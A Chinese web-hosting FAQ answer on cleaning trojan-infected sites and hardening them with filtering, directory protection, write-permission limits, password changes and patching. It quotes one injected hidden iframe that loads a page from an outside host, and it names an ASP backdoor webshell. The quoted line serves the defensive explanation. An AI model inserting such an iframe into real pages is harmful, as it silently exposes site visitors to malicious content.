答:如果您的网站存在上传漏洞或注入漏洞,很容易被黑客上传木马,添加病毒代码。查看您的网页源代码,会发现病毒代码一般是:
〈iframe src=http://www.haogs.com/mm.htm width=0 height=0></iframe>等,而黑客通常会在您的网站里面留下后门程序,如海洋顶端asp木马,以便日后再次侵入您的网站。
解决步骤:
登录虚拟主机的管理中心>点“木马免疫”功能,开户后可以自动过滤木马程序和病毒代码,即使网站有漏洞,被挂了木马,也不会有影响,因为病毒代码会被系统自动过滤,在客户访问的时候不会再出现病毒提示了。
以下步骤可省略:
另外还可以用“查杀病毒”和“木马清除”等功能, 根据提示即可在线清除病毒木马。为了防止以后再次出现木马问题,西部数码提供了“木马免疫”和"10重保护措施",可以轻松解决网站安全问题。
在控制面板里面点“木马免疫”功能,开户后可以自动过滤木马程序和病毒代码,即使网站有漏洞,被挂了木马,也不会有影响,因为病毒代码会被系统自动过滤,在客户访问的时候不会再出现病毒提示了。
另外根据 http://www.123comcom.com/AboutUs/ClearVirus.asp 的提示,登录虚拟主机管理中心,根据需要设置目录保护(建议)、文件保护(建议)、重要目录如后台管理/admin/进行IP限制(建议)、关闭网站写权限(建议)、设置网站脚本(可选)。经过以上步骤,可以有效防止黑客再次挂木的可能。 详情请参见:http://www.123comcom.com/services/webhosting/dvbbsset.asp (动网论坛安全设置案例)
3、为防止您的电脑中病毒,导致黑客获知了FTP上传密码等问题,建议您查杀木马后及时修改FTP登录密码。并尽量使用比较复杂的密码!(建议)
4、对您的网站程序进行升级,打上相关的安全补丁,解决网站可能存在的安全漏洞。如果您的网站使用了动网论坛、动易建站等程序,请将他们升级到最新版,或者到这些程序的官方网站上寻求解决方案。如果您是自己开发的程序,需要特别注意有文件上传功能的地方,动网、动网等程序曾经就发生过因为上传功能有漏洞,导致轻易被黑客入侵的情况。 (建议)
5、关闭网站写权限这个也可以有效的避免中病毒木马,在虚拟主机管理的读写权限设置中可以设置。首先我们先将整个网站的写入权限关闭,点击“关闭网站的写入权限”就可以关闭了,这样任何人都不能通过网页修改您的网站源程序了,当然您自己上传的图片,生成的新文件,及数据库是access数据库都不能进行操作了。不用着急,接下来,点击“单个目录的写入权限设置”,把以上相关目录设置可以写入,就可以解决,例如我们上传图片的目录,我们的数据库目录,存放生成文件的目录,这样就可以有效的增加网站的安全性!